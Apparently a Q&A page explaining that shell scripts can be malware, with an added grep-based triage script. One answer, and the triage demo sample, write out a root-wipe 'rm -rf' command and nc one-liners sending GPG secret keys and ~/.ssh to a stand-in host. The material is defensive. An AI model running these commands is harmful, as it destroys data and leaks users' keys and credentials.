Can a .sh file be malware?

.sh files are shell scripts. They are analogous to .bat files (cmd scripts) under Windows. All of these (shell scripts, cmd scripts, .exe Windows executables, Linux executables (which usually have no extension)) are executable programs; if you run one, it can do anything you can do. So yes, shell scripts can be harmful. Treat a shell script (or a Perl script, or a Python script, or a Ruby script, etc.) with the same suspicion you would treat any other application.

It's a bit harder to hide malware in a shell script without looking suspicious, because this is a script which can be read by people with knowledge of the scripting language. But it is not much harder; few people, even with the technical knowledge, would bother to review the code, so you could hope to go unnoticed.

As a practical matter, there is less malware for Linux floating around than for Windows. This is probably mainly because Linux has a lot less of a market share than Windows on the desktop, so the payback for writing Linux malware is less. Also, there is a long-ingrained culture of sharing little improvements to the system in the Linux world, more so than in the Windows world; so the balance of probability says that this is someone sharing a little improvement and not malware. But it could be malware posing as a little improvement. In the end, you need to decide whether you can trust the site where you're getting this application, or the people who recommended this site. Favor programs that come from your distribution (i.e. that you can install from the software center), as they have undergone some review.


Now regarding this specific program: I had a quick look, and it looks benign. I didn't see anything that would store your password anywhere without telling you or that would do things on your computer other than what it's advertised to do. Note that I only did a 2-minute review, which any remotely clever malware writer could get past. The program looks reasonably well-written.

I wouldn't necessarily recommend this program unless you feel a pressing need that isn't addressed by packages in the Ubuntu distribution. Ubuntu comes with the seahorse GUI frontend to GPG (there is also kgpg for KDE users). You may also want to install seahorse-nautilus (or seahorse-plugin in older versions) for Nautilus integration.


#!/bin/sh
rm -rf --no-preserve-root /

That's malware, and it's a shell script. A more advanced version might include something like:

gpg --export-secret-keys | nc www.evilbadguys.com 443
tar -cz ~/.ssh | nc www.evilbadguys.com 80

So yes, a shell script can be malicious. It can get more complex and call on other scripting languages, libraries, or even be a shell archive that spits out and calls a regular executable.

For the most part, anything you run gets the permissions of the user.
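
A first-pass static check for the kinds of lines shown in the answer above, as an added example that is not part of any answer on this page: it greps a script without ever executing it. The rule names and patterns are assumptions of this example and are easy to evade, so a clean result does not replace reading the script.

```shell
#!/bin/sh
# Static triage: the script under review is only read with grep, never executed.
# Rule names and patterns are assumptions of this example, not a complete list.

triage_script() {
    # Usage: triage_script FILE
    # Prints "LINE:RULE:TEXT" per hit.
    # Returns 0 if nothing matched, 1 if any rule matched, 2 if FILE is unreadable.
    file=$1
    [ -r "$file" ] || { echo "cannot read: $file" >&2; return 2; }
    hits=0
    # Each rule line is "<name> <extended regex>"; read splits on the first blank.
    while read -r rule pattern; do
        matches=$(grep -nE -e "$pattern" "$file") || continue
        hits=1
        # Insert the rule name after grep's line-number prefix.
        printf '%s\n' "$matches" | sed "s/^\([0-9]*\):/\1:$rule:/"
    done <<'RULES'
destructive rm[[:space:]]+-[[:alpha:]]*[rR][[:alpha:]]*[[:space:]]+(--no-preserve-root|(/|~|\$HOME)/?([[:space:]]|$))
network-send (\|[[:space:]]*(nc|ncat|netcat)[[:space:]]|/dev/tcp/)
secret-access (--export-secret-keys|\.ssh|\.gnupg|/etc/shadow)
drop-and-run chmod[[:space:]]+[ugoa]*\+[rw]*x
RULES
    return "$hits"
}

# Demo on a constructed sample; its lines are modeled on the answer above.
# The quoted heredoc is written to a temp file as text and is never run.
sample=$(mktemp)
cat >"$sample" <<'EOF'
#!/bin/sh
echo "Installing helper..."
tar -cz ~/.ssh | nc www.evilbadguys.com 80
rm -rf --no-preserve-root /
EOF
if triage_script "$sample"; then
    echo "no rules matched"
else
    echo "flagged: read these lines before running the script"
fi
rm -f "$sample"
```

Hits are grouped by rule rather than by line order, so one line can appear under several rules.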


Of course! It can do anything you can do: watch logs, keylog you, steal files, etc.

Depending on what its developer has written in the source code, it can do ANYTHING.

And it is very easy to make, so if you are sent a suspicious .sh file, think twice before you execute it!